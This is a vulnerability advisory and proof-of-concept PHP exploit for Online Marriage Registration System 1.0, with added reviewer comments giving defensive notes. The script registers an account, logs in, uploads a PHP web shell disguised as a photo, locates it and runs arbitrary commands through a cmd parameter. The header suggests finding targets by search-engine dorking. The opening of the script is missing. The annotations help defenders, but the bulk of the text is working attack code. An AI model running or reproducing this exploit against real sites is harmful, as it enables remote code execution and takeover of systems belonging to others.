============================================================================================================================================= | # Title : Online Marriage Registration System 1.0 php code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This payload inject php code contains a back door. [+] Line 16 + 19 Set your Target. [+] save payload as poc.php [+] usage from cmd : C:\www\test>php 1.php -u http://127.0.0.1/omrs/ -c dir [+] payload : -c \n"); }
/*
 * NOTE(review): the start of this script (the `<?php` tag, the option parsing
 * that sets $url / $command / $mobile / $password, and the usage() function
 * whose closing `\n"); }` survives above) is not part of this page; nothing
 * below should be read as complete.
 *
 * What the visible code does, in call order (see the bottom of the file):
 *   1. register()            POST /user/signup.php   - creates an account
 *   2. login()               POST /user/login.php    - stores cookies in cookie.txt
 *   3. getRemotePhpFiles()   GET  /                  - snapshot of *.php names
 *   4. upload()              POST /user/marriage-reg-form.php - sends shell.php
 *   5. getRemotePhpFiles()   GET  /                  - second snapshot
 *   6. execCommand()         GET  /user/<new file>?cmd=...
 *
 * Defender notes (all grounded in the code below):
 *   - The whole chain depends on the registration form accepting a file posted
 *     as `husimage` with a .php name and MIME `application/x-php`, and on the
 *     server then serving that file from a web-reachable path. Server-side
 *     validation of upload content/extension, renaming to a fixed safe
 *     extension, and storing uploads outside the document root (or with
 *     script execution disabled) each break the chain independently.
 *   - Observable server-side sequence: signup with fname/lname/address all
 *     'indoushka', then a multipart POST to marriage-reg-form.php, then a GET
 *     for a .php file whose name is 10-42 digits with a `cmd` query parameter.
 *   - Local artifacts the tool leaves on the operator's machine: cookie.txt,
 *     and it expects shell.php and test.jpg to exist in the working directory.
 */

/**
 * Log in as $mobile/$password and return the PHPSESSID the server set.
 *
 * Cookies are written to cookie.txt (CURLOPT_COOKIEJAR); the session id is
 * read back from that file with a regex rather than from the response headers,
 * even though CURLOPT_HEADER is also enabled. Returns null when no PHPSESSID
 * cookie was stored (e.g. failed login).
 */
function login($url, $mobile, $password) {
    $loginUrl = "{$url}/user/login.php";
    $ch = curl_init($loginUrl);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([ 'mobno' => $mobile, 'password' => $password, 'login' => '' ]));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, true);
    curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
    curl_exec($ch);
    curl_close($ch);
    // Extract PHPSESSID from cookie file
    // (the collapsed original had this comment mid-line; the statements below
    // are the ones it refers to)
    $cookies = file_get_contents('cookie.txt');
    preg_match('/PHPSESSID=(\w+);/', $cookies, $matches);
    return $matches[1] ?? null;
}

/**
 * Submit the marriage registration form with shell.php as the husband image
 * and test.jpg as the wife image.
 *
 * Authentication comes from cookie.txt (CURLOPT_COOKIEFILE); the $cookie
 * parameter is accepted but never used. The response is not inspected, so the
 * "uploaded" message is printed whether or not the server accepted the file.
 */
function upload($url, $cookie) {
    $uploadUrl = "{$url}/user/marriage-reg-form.php";
    $fileData = [
        // A .php payload declared as application/x-php - this is the exact
        // request an upload filter (extension + content sniffing) should reject.
        'husimage' => curl_file_create('shell.php', 'application/x-php', ''),
        'wifeimage' => curl_file_create('test.jpg', 'image/jpeg')
    ];
    $ch = curl_init($uploadUrl);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $fileData);
    curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_exec($ch);
    curl_close($ch);
    echo "[+] PHP shell uploaded\n";
}

/**
 * Fetch the site root and return every substring that looks like a
 * 10-42 digit .php filename (the pattern the stored upload is expected to
 * be renamed to). Returns an empty array when nothing matches or the
 * request fails ($response === false is not checked).
 */
function getRemotePhpFiles($url) {
    $filesUrl = "{$url}/";
    $ch = curl_init($filesUrl);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($ch);
    curl_close($ch);
    preg_match_all('/\d{10,42}\.php/', $response, $matches);
    return $matches[0];
}

/**
 * Request /user/<webshell>?cmd=<command> and print the body.
 *
 * Note the path differs from where getRemotePhpFiles() looked (the site
 * root); the code assumes the listed names are served under /user/.
 * From a monitoring point of view, a GET for a numeric-named .php file under
 * /user/ carrying a `cmd` parameter is the request to alert on.
 */
function execCommand($url, $webshell, $command) {
    $commandUrl = "{$url}/user/{$webshell}?cmd=" . urlencode($command);
    $ch = curl_init($commandUrl);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $output = curl_exec($ch);
    curl_close($ch);
    echo "[+] Command output\n" . $output . "\n";
}

/**
 * Create an account through the public signup form. Name and address fields
 * are hard-coded to 'indoushka'; only the mobile number and password vary.
 * Parameter order ($mobile, $password, $url) differs from the other helpers.
 */
function register($mobile, $password, $url) {
    $signupUrl = "{$url}/user/signup.php";
    $ch = curl_init($signupUrl);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([ 'fname' => 'indoushka', 'lname' => 'indoushka', 'mobno' => $mobile, 'address' => 'indoushka', 'password' => $password, 'submit' => '' ]));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_exec($ch);
    curl_close($ch);
    echo "[+] Registered with mobile phone $mobile and password '$password'\n";
}

// --- main flow -------------------------------------------------------------
// $url and $command are expected from the option parsing that is not on this
// page (the usage text mentions -u and -c); $mobile / $password may also be
// preset there, otherwise a 9-digit random number and a fixed password are used.
$mobile = $mobile ?? strval(rand(100000000, 999999999));
$password = $password ?? 'inouvis-2022';
// Registers only when the default password is in use or no mobile was given;
// since $mobile was just defaulted above, the second condition is never true
// at this point.
if ($password === 'inouvis-2022' || $mobile === null) {
    register($mobile, $password, $url);
}
$cookie = login($url, $mobile, $password);
$initialPhpFiles = getRemotePhpFiles($url);
upload($url, $cookie);
$finalPhpFiles = getRemotePhpFiles($url);
// array_diff() keeps the original keys, so index 0 refers to position in
// $finalPhpFiles, not "first new entry".
$webshell = array_diff($finalPhpFiles, $initialPhpFiles)[0];
execCommand($url, $webshell, $command);
?> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================